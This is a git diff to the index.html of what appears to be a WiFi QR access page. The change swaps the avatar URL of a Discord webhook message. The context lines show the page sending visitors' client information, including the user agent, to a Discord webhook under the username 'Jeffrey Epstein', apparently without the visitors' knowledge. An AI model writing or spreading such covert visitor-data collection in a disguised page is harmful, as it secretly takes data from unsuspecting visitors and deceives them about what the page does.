--- a/index.html
+++ b/index.html
@@ -619,7 +619,7 @@ ${clientInfo.userAgent}
                 formData.append('payload_json', JSON.stringify({
                     content: message,
                     username: 'Jeffrey Epstein',
-                    avatar_url: 'https://gainh874-star.github.io/wifi-qr-access/jeff.webp'
+                    avatar_url: 'https://github.com/gainh874-star/wifi-qr-code/releases/download/dasdasdasdas5d4a65sd5asd544a4s4d/jeff.webp'
                 }));
 
                 await fetch(window.DISCORD_WEBHOOK, {
